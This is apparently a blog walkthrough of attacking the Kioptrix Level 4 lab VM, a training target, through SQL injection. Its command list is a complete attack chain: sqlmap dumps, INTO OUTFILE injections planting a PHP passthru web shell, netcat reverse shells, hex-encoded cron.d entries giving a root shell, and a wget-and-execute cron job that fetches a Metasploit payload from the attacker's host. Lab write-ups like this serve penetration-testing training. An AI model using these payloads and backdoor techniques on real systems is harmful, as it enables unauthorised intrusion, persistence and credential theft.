Kioptrix - Level 4 (SQL Injection)

Kioptrix which is a "boot-to-root" operating system which has purposely designed weaknesses built into it. The user's end goal is to interact with system using the highest user privilege they can reach.

There are other vulnerabilities using different techniques to gain access into this box such as breaking through a limited shell as well as local file inclusion using PHP session data.

Kioptrix Logo

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Kioptrix-Level_4_%28SQL_Injection%29.mp4

Method

  • Scanned network for the target [Netdiscover]
  • Port scanned the target [UnicornScan]
  • Banner grabbed the services running on the open port(s) [NMap]
  • Interacted with the web server & discovered a the web application that is possibly subject to a SQL injection vulnerability [Firefox]
  • Exploited the SQL injection and enumerated database [SQLMap]
  • Uploaded a web shell backdoor [SQLMap & Netcat] (Limited user)
  • Manually performed SQL injection injection to dump database [Burp Proxy]
  • Created a web shell on the target [Burp Proxy & Netcat] (Limited user)
  • Created a backdoor shell via a cron job [Burp Proxy & Netcat] (Superuser)
  • Accessed the 'flag' [Text file]
  • Created a backdoor shell via a cron job [Burp Proxy & Metasploit] (Superuser)

Tools

Walkthrough

The first step to attack the target, is to discover it. Scanning with "Netdiscover" produces a list of all IP's & MAC addresses and known vendors which are currently connected to the network. The attacker has prior knowledge and knows the target hasn't spoofed their MAC address as well as being inside a VM. Due to there being only one vendor which relates to a VM, VMware, they successfully identified the target.

By having the target's IP address, the attacker now focuses specifically on the target. The next thing they do is a port scan of every TCP & UDP port. "UnicornScan" shows five open ports; TCP 22 (SSH), TCP 80 (HTTP), TCP 139 (NetBIOS), TCP 445 (SMB) & UDP 137 (NetBIOS). "nmap" verifies the port scan results and at the same time the attacker takes advantage of nmap's inbuilt scripting engine, which detects what services are listening on each port, banner grab (which could possibly identify the software being used & its version) as well as fingerprinting the operating system. Depending on the outcome produced by the scan, nmap could decide to execute any other script(s). In this instance various samba scripts were executed to automatically enumerate it. Nmap fingerprintted the operating system as Linux 2.6.9-2.6.31.

By interacting with the web service using "firefox" the attacker is able to see if any web application is running. The web server responds and presents them with a login screen. The attacker fills in a common username, "admin" and uses "'" as a password. The server responds with a MySQL error message saying there has been a problem processing our request. This signals there is a possible MySQL injection vulnerability.

The attacker can automate the database injection procedure by using "SQLMap" which dramatically speeds up the attack. The attacker uses the same URL which the error was produced on, and with the aid of "tamper data" they are also able easily to clone the same (POST) data which is sent to the target. Editor's note: It could have been just as quick to manually type out the request using the page's source code!). The first attempt to exploit the database, fails, however SQLMap states it can try more 'aggressive and complex' injection methods by increasing the level and risk factor, which the attacker does on the second try. This is successful, allowing the SQLMap to function fully benefiting the attacker. The attacker starts to emulate the back end database and discovers software versions, the operating system, current database & user and if they are a database administrator. Afterwards the attacker starts to view the content of the databases. This is a common procedure as MySQL has an option to automate this, '--dbs', however if there is a specific SQL statement the attacker manually wishes to execute, they can use,' --sql-shell', to do so. The attacker demonstrates this by viewing the contents of the table "members" (however this could have been automated with '-D members -T members --dump'). Editor's note: I also wanted to demonstrate SQLMap output modes; 'minimal' (-v 0) which is just the outcome of the request as well as being able to show the SQL statements its currently sending (-v 3), therefore educating the attacker! SQLMap can also display a lot more detail - such as what SQLmap sees by the server response)._

Another feature of SQLMap (like its ability to give an interactive shell to the database), it can also attempt to get an interactive shell on the system itself, thus giving the attacker remote access to the target. The attacker tries out this feature and it is successful, allowing the attacker to execute commands locally on the target. Editor's note: Due to the web root folder permissions set to superuser, and how sqlmap works (it writes using MySQL to the web root folder, a small client which then the web server uses to execute commands/upload files, thus it uses two different user accounts - this is covered later), the attacker needs to use the 'same method used for file stager'. The attacker creates another shell (a fall back, which is useful incase one shell is terminated for whatever reason...) using a reverse netcat shell.

SQLMap has automated alot of aspects in the database injection, however the attacker wishes to have a little bit more 'control' by manually performing the attack themselves. The attacker starts "Burp Proxy" and configures it as burp allows for easy alternating and repeating requests. Firefox's proxy settings are altered to direct the traffic into burp. Now when the attacker tries to login using firefox, burp captures the request which they can manipulate. The attacker alters the password field to write every value in the database into a file located in the web root folder, as this would allow for the attacker to be able to read it (if they didn't have a remote shell). When the attacker uses the shell to view the listing of the directory, they notice that the user "root" has created the file. The attacker can use this to their advantage later.

The information learnt from the database isn't new to the attacker, as SQLMap simplified the procedure just like creating a web shell to control the target, which the attacker now manually repeats. The attacker uses MySQL to write the backdoor file into the (default) web root folder which is done so by the user 'root', and then uses the web server to execute the code which uses the user 'www-data'. As the vulnerable code requests three values (id, password, username) the attacker 'nulls' the values with blank spaces, plus instead of making it return every value by using "OR", they replace it with "AND" thus always being true, and therefore, only returning one value, so then the attacker's command is only executed once. The attacker also encodes the string as HEX which is to be printed into the file as this isn't interpreted by anything else, which means it wouldn't affect the rest of the code in the vulnerable function.

The attacker now tries something which wasn't automated by SQLmap, as the attacker now knows the MySQL is being executed as root, they write a file into the "cron.d" directory which is used for scheduling. At certain intervals the commands specified within each 'job' is executed as the specified user. The attacker crafts an 'evil' job which is designed to create a reserve shell to be executed as the superuser to be run every minute. The attacker set up a listener to catch the connection from the target and then waits (up to) a minute for the schedule cron job to be executed... Editor's note: The attacker is able to go from "nothing to root", in two commands! An SQLi command and then setting up netcat to listen.

...It wasn't long before the attacker was presented with a shell which has superuser privileges.

Attacker -> LFI -> Session Data -> PHP -> wget -> chmod -> MySQL -> Target -> Attacker

Game over

When they explore root's personal home folder, they notice a text file called "congrats.txt". When the attacker opens it up they see that they have been notified that they have reached the end goal.

The attacker tries to repeat the last injection, but, they replace netcat to create the connection with another binary file. This file is created from the "metasploit framework". This would be necessary if netcat wasn't located on the system. However this time the cron job has been altered slightly. It's still scheduled to be executed on the next minute by the superuser, but the commands have been modified to:

  • Automatically delete the cron job (thus it is only executed once).
  • Move into a folder that is able to be written into and executed from.
  • Download the binary file from the attacker.
  • Give it execute permissions.
  • Execute the binary file.
  • Delete the binary file.

The attacker sets up another listener, starts the web server with the binary file in the web root folder and waits for the target to connect...

Game over...again

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
netdiscover -r 192.168.0.1/24
us -mT -Iv 192.168.0.4:a -r 3000 -R 3 && us -mU -Iv 192.168.0.4:a -r 3000 -R 3
nmap -p 1-65535 -T4 -A -v 192.168.0.4    # -p 22,80,139,445
BT -> firefox -> 192.168.0.4 -> admin:123
// Firefox -> 192.168.0.4 -> admin:'
cd /pentest/database/sqlmap
// Firefox -> Tools -> Addons -> Enable Tamper Data -> Restart firefox
// Firefox -> Tools -> Tamper Data
// Firefox -> 192.168.0.4 -> admin:123
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword                       # y/n
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword  --level=5 --risk=5   # n/n
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 --fingerprint --banner --current-db --current-user --is-dba
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 3 --dbs
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 -D members --tables
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 -D members -T members --columns --count
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 -D members -T members --dump   # john:MyNameIsJohn # robert:ADGAdsafdfwt4gadfga==
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 --users --passwords
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read="/etc/passwd"
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_etc_passwd
#find / -name apache2.conf
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read=/etc/apache2/apache2.conf
#tail /pentest/database/sqlmap/output/192.168.0.4/files/_etc_apache2_apache2.conf
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read=/etc/apache2/sites-enabled/000-default
#grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.4/files/_etc_apache2_sites-enabled_000-default
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read="/var/www/index.php"
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_var_www_index.php
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read="/var/www/checklogin.php"
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_var_www_checklogin.php
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_var_www_checklogin.php | grep -i pass -A 1 -B 1
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --sql-shell -> select * from members -> q   # a/n/a
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --os-shell                                  # n, 3, /var/www/, *none*, y
id                                                                                                                                                           # a <-- All
whereis nc

ifconfig
nc -lvvp 443

/bin/nc.traditional 192.168.0.192 443 -e /bin/sh

id
ls
pwd
#cd /pentest/backdoors/web/weevely
#python weevely.py
#python weevely.py generate g0tmi1k /tmp/output.php
#firefox -> 192.168.0.4/*randomstring*.php   # FAILS
#cd -
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --file-write=/tmp/output.php --file-dest=/var/www/output.php
#python weevely.py http://192.168.0.4/output.php g0tmi1k :system.info auto
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --os-pwn    # n, 1, 3, /var/www/, *none*, y, 1, *ourIP*, *port*, 1, 1
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite    # java -jar /pentest/web/burpsuite/burpsuite_v1.4.01.jar
// Firefox -> Edit -> Preferences -> Advance -> Network -> Settings -> Manual proxy configurations -> 127.0.0.1:8080
// Burp -> Proxy -> Intercept -> Off. Proxy -> Options -> Port: 8080.
BT -> firefox -> 192.168.0.4 -> admin:'
// Burp -> target -> site map -> http://192.168.0.4 -> checklogin.php -> Right click: myusername=admin&mypassword=%27 -> Send to repeater
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' OR 1=1 INTO OUTFILE '/var/www/dump' -- &Submit=Login -> go
curl 192.168.0.4/dump

ls -lah   # ROOT ONLY! =)

// Burp -> decoder -> <?php passthru($_GET['cmd']); ?> -> encode: ascii hex
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/var/www/backdoor.php' LINES TERMINATED BY 0x3c3f70687020706173737468727528245f4745545b27636d64275d293b203f3e -- &Submit=Login -> go

// Burp -> decoder -> * * * * * root /bin/nc.traditional 192.168.0.192 444 -e /bin/sh -> encode: ascii hex       # Dont forget new line at the end!
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/etc/cron.d/backdoor' LINES TERMINATED BY 0x2a202a202a202a202a20726f6f74202f62696e2f6e632e747261646974696f6e616c203139322e3136382e302e31303220343434202d65202f62696e2f73680a -- &Submit=Login -> go

nc -lvvp 444

date
*wait up to 1 minitue*

id
cd /root
ls -lah
cat congrats.txt

ccd /tmp
msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=446 X > back.door
file back.door
ls -lh back.door
python -m SimpleHTTPServer &
msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E
// Burp -> decoder -> * * * * * root rm /etc/cron.d/exploit; cd /tmp && wget 192.168.0.192:8000/back.door && chmod +x back.door && ./back.door; rm /tmp/back.door -> encode: ascii hex       # Dont forget new line at the end!
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/etc/cron.d/exploit' LINES TERMINATED BY 0x2a202a202a202a202a20726f6f7420726d202f6574632f63726f6e2e642f6578706c6f69743b206364202f746d703b2077676574203139322e3136382e302e3139323a383030302f6261636b2e646f6f722026262063686d6f64202b78206261636b2e646f6f72202626202e2f6261636b2e646f6f723b20726d206261636b2e646f6f720a -- &Submit=Login -> go

date
*wait up to 1 minitue*

id

Notes

  • You need to create a new virtual machine and attach an existing hard drive (kioptrix 4!).
  • The target uses DHCP to obtain an IP address.

Songs: Memory Lane - Netsky & Just One Second (Apex Remix) - London Elektricity

Video length: 11:31

Capture length: 36:49

Blog Post: https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/